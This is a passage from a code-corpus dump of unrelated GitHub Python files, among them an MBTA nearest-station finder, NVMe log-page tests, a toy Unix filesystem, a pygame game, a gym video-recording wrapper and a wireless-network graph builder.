it\n\ndef distance(lat1, lon1, lat2, lon2):\n # Haversine formula to calculate distance\n radius = 6371 # km\n\n dlat = math.radians(lat2 - lat1)\n dlon = math.radians(lon2 - lon1)\n a = (math.sin(dlat / 2) ** 2 + \n math.cos(math.radians(lat1)) * math.cos(math.radians(lat2)) *\n math.sin(dlon / 2) ** 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n distance = radius * c\n\n return distance\n\n\ndef get_json(url: str) -> dict:\n \"\"\"\n Given a properly formatted URL for a JSON web API request, return a Python JSON object containing the response to that request.\n Both get_lat_long() and get_nearest_station() might need to use this function.\n \"\"\"\n response = requests.get(url)\n data = response.json()\n return data\n pass\n\n\ndef get_lat_long(place_name: str) -> tuple[str, str]:\n \"\"\"\n Given a place name or address, return a (latitude, longitude) tuple with the coordinates of the given place.\n\n See https://docs.mapbox.com/api/search/geocoding/ for Mapbox Geocoding API URL formatting requirements.\n \"\"\"\n url = f\"https://api.mapbox.com/geocoding/v5/mapbox.places/{place_name}.json?access_token=pk.eyJ1IjoiYWRyaWFuY3Jpb2xsbyIsImEiOiJjbGZ2dGFwNXMwMTA2M2RxN3YwdGN4amNpIn0.QVp_50lEd72_KTRGfz-PPA\" \n data = get_json(url)\n coords = data['features'][0]['geometry']['coordinates']\n lat_long = (coords[1],coords[0])\n return lat_long\n \ndef get_nearest_station(latitude: str, longitude: str) -> tuple[str, bool]:\n \"\"\"\n Given latitude and longitude strings, return a (station_name, wheelchair_accessible) tuple for the nearest MBTA station to the given coordinates.\n\n See https://api-v3.mbta.com/docs/swagger/index.html#/Stop/ApiWeb_StopController_index for URL formatting requirements for the 'GET /stops' API.\n \"\"\"\n response = requests.get(f'https://api-v3.mbta.com/stops?sort=distance&filter%5Blatitude%5D={latitude}&filter%5Blongitude%5D={longitude}')\n data = response.json()\n mapdict = data[\"data\"][0]\n station_name = 
mapdict['attributes']['name']\n if(mapdict['attributes']['wheelchair_boarding'] >= 1):\n wheelchair = True\n else:\n wheelchair = False\n\n return (station_name,wheelchair)\n\n\n\ndef find_stop_near(place_name: str) -> tuple[str, bool]:\n \"\"\"\n Given a place name or address, return the nearest MBTA stop and whether it is wheelchair accessible.\n\n This function might use all the functions above.\n \"\"\"\n long_lat = get_lat_long(place_name)\n nearest_station = get_nearest_station(long_lat[0],long_lat[1])\n return nearest_station[0]\n\n\ndef main():\n \"\"\"\n You can test all the functions here\n \"\"\"\n #print(test_api())\n #print(get_json('https://api-v3.mbta.com/stops'))\n print(get_lat_long(\"Boston Commons\"))\n print(get_nearest_station('42.3541047','-71.064822'))\n print(find_stop_near(\"Boston Commons\"))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"adriancriollo/mbtahelper","sub_path":"mbta_helper.py","file_name":"mbta_helper.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21565774927","text":"import logging\n\nTOL = 1.e-10 # Floating point tolerance.\nONE_THIRD = 0.3333333333333333 # One third: nothing more, nothing less.\nGROWTH_LIMIT = 5 # Limits area of boundary triangles.\nOVERLAP_TRIM_FACTOR = 0.995 # Reduces sphere radii to avoid overlaps.\n\nLOG_FORMAT = '%(name)-8s %(levelname)-8s %(asctime)s.%(msecs)03d : %(message)s'\nTIME_STAMP_FORMAT = '%d-%m-%y %H:%M:%S'\nformatter = logging.Formatter(LOG_FORMAT, TIME_STAMP_FORMAT)\n\nlogger = logging.getLogger('MSP-Build')\nstream_h = logging.StreamHandler()\nfile_h = logging.FileHandler('msp.log', mode='w')\nfor handler in (stream_h, file_h):\n handler.setFormatter(formatter)\n logger.addHandler(handler)\nlogger.setLevel(logging.DEBUG)\n","repo_name":"chrisk314/mesh-sphere-packing","sub_path":"mesh_sphere_packing/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"76"} +{"seq_id":"23690038478","text":"\n# -- python imports --\nimport pandas as pd\n\nfrom ._debug import VERBOSE\nfrom ._write import *\nfrom ._convert import *\nfrom ._utils import *\n\ndef append_new_pair(data,uuid_file,new_pair):\n existing_uuid = get_uuid_from_config(data,new_pair.config)\n existing_config = get_config_from_uuid(data,new_pair.uuid)\n if existing_uuid == -1 and existing_config == -1:\n data.uuid.append(new_pair.uuid)\n data.config.append(new_pair.config)\n write_uuid_file(uuid_file,data)\n else:\n if VERBOSE: print(\"Not appending data to file since data already exists.\")\n if existing_uuid != -1 and VERBOSE:\n print(f\"UUID already exists: [{new_pair.uuid}]\")\n if existing_config == -1 and VERBOSE:\n print(f\"Config already exists\")\n print_config(new_pair.config)\n\ndef set_new_field_default(data,new_field,default):\n configs = pd.DataFrame(data.config)\n keys = list(configs.columns)\n if new_field in keys:\n if VERBOSE: print(f\"Not appending new field [{new_field}]. 
Field already exists.\")\n return -1\n configs[new_field] = default\n data.config = configs.to_dict()\n return 1\n\ndef set_new_field_data(data,new_data,new_field):\n for uuid,new_results in zip(new_data.uuid,new_data.results):\n index = np.where(data.uuid == uuid)[0]\n data.config[index][new_field] = new_results\n\n__all__ = ['append_new_pair','set_new_field_default','set_new_field_data']\n\n\n","repo_name":"gauenk/cl_gen","sub_path":"lib/cache_io/uuid_cache/_append.py","file_name":"_append.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24145856148","text":"\"\"\"\nTARJETA DE CREDTO\n\n1 - Recibir por consola el valor de una compra\n2 - que se pueda ingresar el numero de cuotas con las que se va a pagar\n3 - Calcular el valor de la cuota\nNota: no calcular intereses\nUsando un ciclo While queremos que imprima el plan de pago y le muestre el cupo liberado con cada pago.\n\npara que genere el plan de pagos : imprimir cuanto paga en cada cuota y cuanto resta del monto inicial \"\"\"\n\n\nValorCompra = int(input(\"Ingrese el valor Total de la compra = \"))\ncuota = int(input(\"Ingrese el numero de cuotas = \"))\n\nvalor_total = ValorCompra/cuota \ncuota_num = 1\n\nwhile ValorCompra > 0:\n print(\"Cuota\" , cuota_num, \" a pagar = \" ,valor_total)\n ValorCompra -= valor_total\n cuota_num += 1\n print(\"Restante por pagar: \" ,ValorCompra)\n \nprint(\"Felicitaciones, El Credito ha sido Cancelado!\")\n","repo_name":"Edna2607/Nuevas_Tecnologias_Edna","sub_path":"TarjetaCredito.py","file_name":"TarjetaCredito.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38101360949","text":"\"\"\"\nFile/Directory level abstractions go here\n\nAuthor: Angad Gill\n\"\"\"\nfrom typing import List, Tuple\nfrom unix_fs.data_structures import Inode, DataBlock, DirectoryBlock\n\nclass File(Inode):\n def __init__(self, device=None, index=None):\n super().__init__(i_type=1, device=device, index=index)\n\n def write(self, data):\n \"\"\" Write to the File. Allocate DataBlocks and write text to them \"\"\"\n # TODO: This is basically \"append\" right now. 
Update when \"seek\" is added\n # Check to see if any DataBlock is already assigned\n if sum(self.address_direct) != 0:\n # If assigned, append data to last block\n last_assigned = self._last_assigned_address()\n block = DataBlock(device=self._device, index=last_assigned)\n excess_data = block.append(data)\n else:\n excess_data = data\n\n # Add all excess data into new blocks\n while len(excess_data) > 0:\n # assign a new block and add to Inode\n block = DataBlock(device=self._device)\n self._add_to_address_list(block)\n # Write to block\n excess_data = block.append(excess_data)\n\n def read(self):\n \"\"\" Reads and returns the first block, for now \"\"\"\n data = ''\n for address in self.address_direct:\n if address != 0:\n block = DataBlock(device=self._device, index=address)\n data += block.data\n else:\n break\n return data\n\n\nclass Directory(Inode):\n def __init__(self, device, index=None):\n super().__init__(i_type=2, device=device, index=index)\n\n # TODO: Name assignment to directory is clunky\n @property\n def name(self) -> str:\n if self.address_direct[0] == 0:\n raise AttributeError(\"{}.name not set yet\".format(self.__class__))\n else:\n block = DirectoryBlock(device=self._device, index=self.address_direct[0])\n return block.name\n\n @name.setter\n def name(self, name, write_through=True) -> None:\n if self.address_direct[0] == 0:\n block = DirectoryBlock(device=self._device)\n self._add_to_address_list(block)\n else:\n block = DirectoryBlock(device=self._device, index=self.address_direct[0])\n block.name = name\n if write_through:\n block.__write__()\n\n def add(self, entry_name, entry_inode):\n \"\"\" Add to the Directory. Allocate DirectoryBlocks and write name and inodes to them \"\"\"\n\n # Check to see if name already exits\n existing_names, _ = self.read()\n if entry_name in existing_names:\n raise Exception('{}: entry already exists'.format(self.__class__))\n\n # Check to see if any DirectoryBlocks is already assigned\n if sum(self.address_direct) != 0:\n # If assigned, append data to last block\n last_assigned = self._last_assigned_address()\n block = DirectoryBlock(device=self._device, index=last_assigned)\n if block.is_full():\n # Assign a new block\n block = DirectoryBlock(device=self._device)\n self._add_to_address_list(block)\n else:\n # assign a new block and add to Inode\n block = DirectoryBlock(device=self._device)\n self._add_to_address_list(block)\n # Write to block\n block.add_entry(entry_name=entry_name, entry_inode_index=entry_inode)\n\n def remove(self, entry_name, entry_inode):\n \"\"\" Remove from Directory \"\"\"\n if sum(self.address_direct) == 0:\n raise Exception('{} {} contains no files'.format(self.__class__, self.index))\n\n for address in self.address_direct:\n block = DirectoryBlock(device=self._device, index=address)\n try:\n block.remove_entry(entry_name=entry_name, entry_inode_index=entry_inode)\n # TODO: Change this to not use try except\n except Exception:\n continue\n\n def read(self) -> Tuple[List[str], List[int]]:\n \"\"\" Reads entry names and inode numners from directory \"\"\"\n entry_names = [] # type: List\n entry_inodes = [] # type: List\n for address in self.address_direct:\n if address != 0:\n block = DirectoryBlock(device=self._device, index=address)\n for e in block.entry_names:\n if e != '':\n entry_names += [e]\n for e in block.entry_inode_indices:\n if e != 0:\n entry_inodes += [e]\n else:\n break\n return entry_names, 
entry_inodes\n","repo_name":"angadgill/unix-fs-py","sub_path":"unix_fs/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73948020084","text":"import pygame\nimport os\nimport sys\n\nfrom Objects.player import Player\nfrom Objects.enemy import Enemy\nfrom Objects.health import Health\nfrom Objects.counter import Counter\n\ndef load_image(file_name):\n path = os.path.join(get_resource_path(), file_name)\n return pygame.image.load(path)\n\ndef get_resource_path():\n if hasattr(sys, '_MEIPASS'):\n return sys._MEIPASS\n else:\n return ''\n\nbackground_image = load_image(\"resources/Sprites/office.png\")\n\nclass Game:\n def __init__(self, screen, clock):\n self.player = Player(screen)\n self.health = Health(screen)\n self.counter = Counter()\n self.enemies = []\n self.frame_count = 0\n self.keep_playing = True\n self.main_menu = False\n self.screen = screen\n self.clock = clock\n self.dt = 0\n self.prev_score = 0\n self.enemy_speed = 2\n self.spawn_rate = 200\n\n def play(self):\n #Refreshes screen\n self.screen.fill(\"white\")\n self.screen.blit(background_image, (0, 0))\n self.health.draw(self.screen)\n \n #controls enemy spawn rate\n if self.frame_count % self.spawn_rate == 0:\n new_enemy = Enemy(self.player.x, self.player.y, 50, 50, (255, 0, 0), self.get_difficulty())\n self.enemies.append(new_enemy)\n\n #controls enemy behavior\n for enemy in self.enemies:\n enemy.move(self.player.x, self.player.y)\n enemy.draw(self.screen)\n #create boundaries to prevent enemy from moving into hit boxes if collisions are true\n if enemy.check_collision(self.player.get_hitbox()):\n self.health.damage(self.player.damaged)\n self.player.damage()\n #Checks for game over state \n if self.health.game_over():\n self.main_menu = True\n self.keep_playing = False\n self.counter.save_high_score()\n if enemy.check_collision(self.player.hammer):\n #player gets a point\n enemy.die()\n self.counter.increment(self.screen)\n\n #Counter instantiation\n self.counter.draw(self.screen, 20, 65) # Adjust the position of the counter on the screen\n\n #controls player behavior\n self.player.draw(self.screen, self.frame_count) \n keys = pygame.key.get_pressed()\n if keys[pygame.K_q]:\n self.keep_playing = False\n self.main_menu = True\n self.counter.save_high_score()\n\n self.player.move(keys, self.dt, self.frame_count)\n\n #Tracks frames/frame rate\n self.dt = self.clock.tick(60) / 1000\n self.frame_count += 1\n return self.keep_playing, self.main_menu\n\n def get_difficulty(self):\n score = self.counter.value\n if (score - self.prev_score) >= 5:\n self.prev_score = score\n if self.enemy_speed < 5:\n self.enemy_speed += .10\n if self.spawn_rate > 20:\n self.spawn_rate -= 20\n return self.enemy_speed\n return self.enemy_speed\n","repo_name":"smrrobison/Mrs.Barry","sub_path":"Objects/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26304045977","text":"from sqlalchemy import create_engine\nimport pandas as pd\nimport numpy as np\n\ndef get_feature_dtypes(connect_string, table):\n engine = create_engine(connect_string)\n df = pd.read_sql(f\"select feature,dtype from {table}_features\", engine)\n features = df.set_index('feature')['dtype'].to_dict()\n return features\n\ndef get_projection(connect_string, table):\n engine = create_engine(connect_string)\n df = 
pd.read_sql(f\"select * from {table}_projection\", engine).reset_index()\n projection = df.to_dict('records')\n return projection\n\ndef get_predicate_data(model, predicate, connect_string, table):\n engine = create_engine(connect_string)\n predicate_data = []\n for feature in predicate.feature_values.keys():\n features_str = f'{model},{feature}'\n where = predicate.query(exclude=feature)\n if where == \"\":\n query = f\"select {features_str} from {table}\"\n else:\n query = f\"select {features_str} from {table} where {where}\"\n df = pd.read_sql(query, engine)\n df['anomaly'] = predicate.contains(df, features=[feature])\n predicate_data.append({'x': feature, 'y': model.lower(), 'data': df[[feature, model.lower(), 'anomaly']].to_dict('records')})\n return predicate_data","repo_name":"bmontambault/pixal_vis","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6193651709","text":"import time\nimport pytest\nimport logging\n\nfrom nvme import Controller, Namespace, Buffer, Qpair, Pcie, Subsystem\n\n\ndef test_getlogpage_page_id(nvme0, buf):\n for lid in (1, 2, 3):\n nvme0.getlogpage(lid, buf).waitdone()\n\n for lid in (0, 0x6f, 0x7f):\n with pytest.warns(UserWarning, match=\"ERROR status: 01/09\"):\n nvme0.getlogpage(lid, buf).waitdone()\n \n\n@pytest.mark.parametrize(\"repeat\", range(32))\ndef test_getlogpage_invalid_numd(nvme0, repeat):\n dts = nvme0.mdts//4 + 1 + repeat\n buf = Buffer(dts*4)\n\n for lid in (1, 2, 3):\n with pytest.warns(UserWarning, match=\"ERROR status: 00/02\"):\n nvme0.getlogpage(lid, buf).waitdone()\n\n\ndef test_getlogpage_after_error(nvme0, nvme0n1, buf, qpair):\n nvme0.getlogpage(1, buf).waitdone()\n assert buf.data(7, 0) == 0\n nvme0n1.write_uncorrectable(qpair, 0, 8).waitdone()\n\n # generate 2 errors\n with pytest.warns(UserWarning, match=\"ERROR status: 02/81\"):\n nvme0n1.read(qpair, buf, 0, 8).waitdone()\n with pytest.warns(UserWarning, match=\"ERROR status: 02/81\"):\n nvme0n1.read(qpair, buf, 0, 8).waitdone()\n\n time.sleep(0.1) # wait error information ready\n nvme0.getlogpage(1, buf).waitdone()\n nerror1 = buf.data(7, 0)\n nerror2 = buf.data(64+7, 64)\n assert nerror1 == nerror2+1\n\n nvme0n1.write(qpair, buf, 0, 8).waitdone()\n \n\n@pytest.mark.parametrize(\"len\", (1, 2, 4))\ndef test_getlogpage_data_unit_read(nvme0, nvme0n1, buf, qpair, len):\n if not nvme0n1.supports(5):\n pytest.skip(\"compare is not support\")\n\n nvme0n1.write(qpair, buf, 0, len).waitdone()\n\n nvme0.getlogpage(2, buf).waitdone()\n nread1 = buf.data(47, 32)\n\n # read\n for i in range(1000):\n nvme0n1.read(qpair, buf, 0, len).waitdone()\n nvme0.getlogpage(2, buf).waitdone()\n nread2 = buf.data(47, 32)\n assert nread2 == nread1+len\n\n # compare\n nvme0n1.read(qpair, buf, 0, len).waitdone() # get correct data\n for i in range(1000):\n nvme0n1.compare(qpair, buf, 0, len).waitdone()\n nvme0.getlogpage(2, buf).waitdone()\n nread3 = buf.data(47, 32)\n assert nread3 == nread2+len\n\n # verify\n if nvme0n1.supports(0xc):\n for i in range(1000):\n nvme0n1.verify(qpair, 0, len).waitdone()\n nvme0.getlogpage(2, buf).waitdone()\n nread4 = buf.data(47, 32)\n assert nread4 == nread3+len \n\n\n@pytest.mark.parametrize(\"len\", (1, 2, 4))\ndef test_getlogpage_data_unit_write(nvme0, nvme0n1, len, buf, qpair):\n if not nvme0n1.supports(5):\n pytest.skip(\"compare is not support\")\n\n nvme0n1.write(qpair, buf, 0).waitdone()\n\n nvme0.getlogpage(2, 
buf).waitdone()\n nwrite1 = buf.data(63, 48)\n\n for i in range(1000):\n nvme0n1.write(qpair, buf, 0, len).waitdone()\n\n nvme0.getlogpage(2, buf).waitdone()\n nwrite2 = buf.data(63, 48)\n assert nwrite2 == nwrite1+len\n \n for i in range(1000):\n nvme0n1.write_uncorrectable(qpair, 0, len).waitdone()\n\n nvme0.getlogpage(2, buf).waitdone()\n nwrite3 = buf.data(63, 48)\n assert nwrite3 == nwrite2\n\n nvme0n1.write(qpair, Buffer(4096), 0, 8).waitdone()\n \n\ndef test_getlogpage_power_cycle_count(nvme0, subsystem, buf):\n def get_power_cycles(nvme0):\n nvme0.getlogpage(2, buf, 512).waitdone()\n return buf.data(115, 112)\n\n powercycle = get_power_cycles(nvme0)\n subsystem.power_cycle(10)\n nvme0.reset()\n assert get_power_cycles(nvme0) == powercycle+1\n\n\ndef test_getlogpage_namespace(nvme0, buf):\n nvme0.getlogpage(2, buf, nsid=1).waitdone()\n nvme0.getlogpage(2, buf, nsid=0xffffffff).waitdone()\n\n # getlogpage for id=2 nsid can be 0 or 0xffffffff\n nvme0.getlogpage(2, buf, nsid=0).waitdone()\n with pytest.warns(UserWarning, match=\"ERROR status: 00/0b\"):\n nvme0.getlogpage(2, buf, nsid=2).waitdone()\n with pytest.warns(UserWarning, match=\"ERROR status: 00/0b\"):\n nvme0.getlogpage(2, buf, nsid=0xfffffffe).waitdone()\n\n \ndef test_getlogpage_smart_composite_temperature(nvme0):\n smart_log = Buffer()\n \n nvme0.getlogpage(0x02, smart_log, 512).waitdone()\n ktemp = smart_log.data(2, 1)\n logging.debug(\"temperature: %d degreeF\" % ktemp)\n\n # warning with AER\n with pytest.warns(UserWarning, match=\"AER notification is triggered\"):\n # over composite temperature threshold\n nvme0.setfeatures(4, cdw11=ktemp-10).waitdone()\n \n nvme0.getlogpage(0x02, smart_log, 512).waitdone()\n logging.debug(\"0x%x\" % smart_log.data(0))\n nvme0.getlogpage(0x02, smart_log, 512).waitdone() \n assert smart_log.data(0) & 0x2\n\n # higher threshold\n nvme0.setfeatures(4, cdw11=ktemp+10).waitdone()\n\n # aer is not expected\n nvme0.getlogpage(0x02, smart_log, 512).waitdone()\n ktemp = smart_log.data(2, 1)\n logging.debug(\"temperature: %d degreeF\" % ktemp)\n\n # revert to default\n orig_config = 0\n def getfeatures_cb_4(cdw0, status):\n nonlocal orig_config; orig_config = cdw0\n nvme0.getfeatures(4, sel=1, cb=getfeatures_cb_4).waitdone()\n nvme0.setfeatures(4, cdw11=orig_config).waitdone() \n\n \ndef test_getlogpage_persistent_event_log(nvme0):\n if not (nvme0.id_data(261)&0x10):\n pytest.skip(\"feature sv is not supported\")\n\n\ndef test_getlogpage_firmware_slot_info_nsid_1(nvme0, buf):\n \"\"\"For Log Pages with a scope of NVM subsystem or controller (as shown in Figure 191 and Figure 192), the\ncontroller should abort commands that specify namespace identifiers other than 0h or FFFFFFFFh with\nstatus Invalid Field in Command.\"\"\"\n\n nvme0.getlogpage(3, buf, 512, nsid=0).waitdone()\n nvme0.getlogpage(3, buf, 512, nsid=0xffffffff).waitdone()\n with pytest.warns(UserWarning, match=\"ERROR status: 00/02\"):\n nvme0.getlogpage(3, buf, 512, nsid=1).waitdone()\n","repo_name":"catogts/conformance","sub_path":"01_admin/logpage_test.py","file_name":"logpage_test.py","file_ext":"py","file_size_in_byte":5813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71448471926","text":"import os\nimport gym\nfrom typing import Callable\n\nfrom gym import logger\nfrom powderworld.monitoring import video_recorder\n\ndef capped_cubic_video_schedule(episode_id):\n if episode_id < 100:\n return episode_id % 10 == 0\n # return int(round(episode_id ** (1.0 / 3))) ** 3 
== episode_id\n else:\n return episode_id % 100 == 0\n\n\nclass RecordVideoWrapper(gym.Wrapper):\n def __init__(\n self,\n env,\n video_folder: str,\n episode_trigger: Callable[[int], bool] = None,\n step_trigger: Callable[[int], bool] = None,\n video_length: int = 0,\n name_prefix: str = \"rl-video\",\n wandb = None,\n ):\n super(RecordVideoWrapper, self).__init__(env)\n\n if episode_trigger is None and step_trigger is None:\n episode_trigger = capped_cubic_video_schedule\n\n trigger_count = sum([x is not None for x in [episode_trigger, step_trigger]])\n assert trigger_count == 1, \"Must specify exactly one trigger\"\n\n self.episode_trigger = episode_trigger\n self.step_trigger = step_trigger\n self.video_recorder = None\n\n self.video_folder = os.path.abspath(video_folder)\n # Create output folder if needed\n if os.path.isdir(self.video_folder):\n logger.warn(\n f\"Overwriting existing videos at {self.video_folder} folder (try specifying a different `video_folder` for the `RecordVideo` wrapper if this is not desired)\"\n )\n os.makedirs(self.video_folder, exist_ok=True)\n\n self.name_prefix = name_prefix\n self.step_id = 0\n self.video_length = video_length\n\n self.recording = False\n self.recorded_frames = 0\n self.is_vector_env = getattr(env, \"is_vector_env\", False)\n self.episode_id = 0\n self.wandb = wandb\n\n def reset(self, **kwargs):\n observations = super(RecordVideoWrapper, self).reset(**kwargs)\n if not self.recording and self._video_enabled():\n self.start_video_recorder()\n return observations\n\n def start_video_recorder(self):\n self.close_video_recorder()\n\n video_name = f\"{self.name_prefix}-step-{self.step_id}\"\n if self.episode_trigger:\n video_name = f\"{self.name_prefix}-episode-{self.episode_id}\"\n\n base_path = os.path.join(self.video_folder, video_name)\n self.video_recorder = video_recorder.VideoRecorder(\n env=self.env,\n base_path=base_path,\n metadata={\"step_id\": self.step_id, \"episode_id\": self.episode_id},\n )\n\n self.video_recorder.capture_frame()\n self.recorded_frames = 1\n self.recording = True\n\n def _video_enabled(self):\n if self.step_trigger:\n return self.step_trigger(self.step_id)\n else:\n return self.episode_trigger(self.episode_id)\n\n def step(self, action):\n # This takes a step given an action. 
If we're recording, we want to pass in record_frames=True so it can record the frames for us.\n self.set_attr('is_recording', self.recording)\n observations, rewards, dones, infos = super(RecordVideoWrapper, self).step(action)\n\n # increment steps and episodes\n self.step_id += 1\n if not self.is_vector_env:\n if dones:\n self.episode_id += 1\n elif dones[0]:\n self.episode_id += 1\n \n if self.recording:\n self.video_recorder.capture_frame()\n self.recorded_frames += 1\n if self.video_length > 0:\n if self.recorded_frames > self.video_length:\n self.close_video_recorder()\n else:\n if not self.is_vector_env:\n if dones:\n self.close_video_recorder()\n elif dones[0]:\n self.close_video_recorder()\n\n elif self._video_enabled():\n self.start_video_recorder()\n\n return observations, rewards, dones, infos\n\n def close_video_recorder(self) -> None:\n if self.recording:\n self.video_recorder.close(self.wandb)\n self.recording = False\n self.recorded_frames = 1\n","repo_name":"kvfrans/powderworld","sub_path":"powderworld/monitoring/record_video_wrapper.py","file_name":"record_video_wrapper.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"76"} +{"seq_id":"41581769032","text":"from collections import Counter\ndef solution(genres, plays):\n totalPlay = {key:0 for key in genres}\n genre_idx = {key:[] for key in genres}\n for i in range(len(plays)):\n totalPlay[genres[i]] += plays[i]\n genre_idx[genres[i]].append([plays[i],i])\n\n sortedPlays = Counter(totalPlay).most_common()\n\n for value in genre_idx.values():\n value.sort(key=lambda x: x[0], reverse=True)\n\n res = []\n for (genre, totalCnt) in sortedPlays:\n res.append(genre_idx[genre][0][1])\n if len(genre_idx[genre]) > 1:\n res.append(genre_idx[genre][1][1])\n return res ","repo_name":"hongii/programmers_python","sub_path":"LV 3/베스트앨범.py","file_name":"베스트앨범.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14225192642","text":"#!/usr/bin/python\r\n\r\nimport sys\r\nimport os\r\nimport logging\r\n\r\nimport igraph as ig\r\nimport numpy as np\r\nimport csv\r\n\r\n# Change to logging.DEBUG, .INFO, .WARNING, .ERROR, .CRITICAL\r\nlog_level = logging.DEBUG\r\nlog_format = \"[%(asctime)s] - {%(module)s:%(lineno)d} - %(levelname)s - %(message)s\"\r\ndatefmt = '%d-%b-%y %H:%M:%S'\r\nlog_fn = 'graph_creation.log'\r\nlogging.basicConfig(filename=log_fn, level=log_level,\r\n format=log_format, datefmt=datefmt)\r\n\r\ndef graph_creation(dataset, print_stats=True):\r\n \"\"\" \r\n Graph creation function, transforming a data set generated via the GRAND tool into a graph. 
\r\n\r\n Params\r\n ------\r\n dataset : str\r\n Relative path towards the data set\r\n print_stats : bool\r\n Print graph statistics to terminal console\r\n \r\n\r\n Return\r\n ------\r\n g : iGraph\r\n Graph with vertices representing CPE devices and edges representing wireless LOS links\r\n \"\"\"\r\n\r\n if os.path.isfile(dataset):\r\n logging.info(\"Creating graph with data set: \" + dataset)\r\n else:\r\n logging.critical(\"CRITICAL: Input file does not exist\")\r\n return -1\r\n\r\n # Parse input CSV data\r\n nodeA_column = 0\r\n nodeAtype_column = 1\r\n nodeB_column = 2\r\n nodeBtype_column = 3\r\n distance_column = 4\r\n maxbitrate_column = 9\r\n maxpathloss_column = 7\r\n nodeA = []\r\n nodeA_type = []\r\n nodeB = []\r\n nodeB_type = []\r\n weights = []\r\n with open(dataset, 'r') as csvFile:\r\n reader = csv.reader(csvFile)\r\n it = 0\r\n for row in reader:\r\n if it == 0:\r\n it += 1\r\n assert row[nodeA_column] == \"NodeAid\"\r\n assert row[nodeAtype_column] == \"NodeAType\"\r\n assert row[nodeB_column] == \"NodeBid\"\r\n assert row[nodeBtype_column] == \"NodeBType\"\r\n assert row[distance_column] == \"distance\"\r\n assert row[maxbitrate_column] == \"maxbitrate\"\r\n assert row[maxpathloss_column] == \"maxPathLoss\"\r\n continue\r\n try:\r\n nodeA.append(int(row[nodeA_column]))\r\n nodeA_type.append((row[nodeAtype_column]))\r\n nodeB.append(int(row[nodeB_column]))\r\n nodeB_type.append((row[nodeBtype_column]))\r\n weights.append(float(row[distance_column]))\r\n except:\r\n print(\"Error parsing graph data\")\r\n return -1\r\n\r\n # Construct graph\r\n g = ig.Graph()\r\n\r\n # Add single PoP node\r\n g.add_vertices(1)\r\n g.vs[\"id\"] = 0\r\n g.vs[\"type\"] = 'PoP'\r\n\r\n # Add all CPE nodes: igraph ids 1 -> nb_cpe_nodes + 1\r\n nb_cpe_nodes = np.max(nodeA)\r\n cpe_node_id = range(1, nb_cpe_nodes+1)\r\n g.add_vertices(nb_cpe_nodes)\r\n g.vs[1:][\"id\"] = cpe_node_id\r\n g.vs[1:][\"type\"] = 'CPE'\r\n\r\n # Get links between EDGE nodes according to input graph data\r\n edge_links = [(nodeA[i], nodeB[i], weights[i]) for i in range(len(nodeA))]\r\n unique_edge_links = list(set(edge_links))\r\n edges = []\r\n edge_weights = []\r\n\r\n for x in unique_edge_links:\r\n # check if link (A, B) or link (B, A) is already in edges this avoids\r\n # adding a duplicate symmetric edge as the graph is undirected e.g. 
if\r\n # (0, 104) is already in edges, do not append (104, 0)\r\n edge1 = (x[0], x[1])\r\n edge2 = (x[1], x[0])\r\n if (edge1 not in edges) and (edge2 not in edges):\r\n edges.append(edge1)\r\n edge_weights.append(x[2]) # weights are symmetric\r\n\r\n # Add edges to graph\r\n g.add_edges(edges)\r\n g.es[\"weight\"] = edge_weights \r\n\r\n # Visualize graph\r\n if print_stats:\r\n print(g)\r\n ig.summary(g)\r\n\r\n return g\r\n\r\nif __name__ == '__main__':\r\n\r\n if len(sys.argv) == 2:\r\n graph_creation(sys.argv[1])\r\n else:\r\n print(\"Missing input data\")\r\n print(\"Usage: graph_analysis.py graph_data_file\")\r\n","repo_name":"brdb/fwa-network-modeling-and-planning","sub_path":"core/graph_creation.py","file_name":"graph_creation.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37509447971","text":"import random as rd\nimport numpy as np\nimport cv2\n\nfrom datumaro.components.project import ProjectDataset # project-related things\nfrom datumaro.components.extractor import DatasetItem, Bbox, Polygon, AnnotationType, LabelCategories\nfrom tqdm import tqdm\nfrom collections import defaultdict\nfrom pathlib import Path\nfrom PIL import Image, ImageDraw, ImageFont\nfrom typing import Union\nfrom copy import deepcopy\nfrom dltools.dataset.args import DrawItemArg\n\n\nclass customDataset:\n\n def __init__(self, dataset:ProjectDataset) -> None:\n self.dataset = dataset\n categories = dataset.categories()[AnnotationType.label]\n self._imageDatas = (customDataset.ImageData(item, categories) for item in dataset)\n\n def drawAndExport(self, lineStyle, cornerStyle):\n for imageData in tqdm(self._imageDatas, total=len(self.dataset)):\n imageData.drawItem(lineStyle, cornerStyle).saveImg()\n\n class ImageData:\n colorMap = defaultdict(lambda :(rd.randint(0,64)*4+3,rd.randint(0,64)*4+3,rd.randint(0,64)*4+3))\n try:\n with open(str(self.root/'labelmap.txt'),'r', encoding='utf-8') as f:\n labelmap = f.readlines()\n labelmap = [line.split(':')[0] for line in labelmap]\n labelmap = dict([(line[0], line[1]) for line in labelmap])\n colorMap.update(labelmap)\n print(colorMap)\n except:\n print('label color를 임의로 생성합니다.')\n\n def __init__(self, 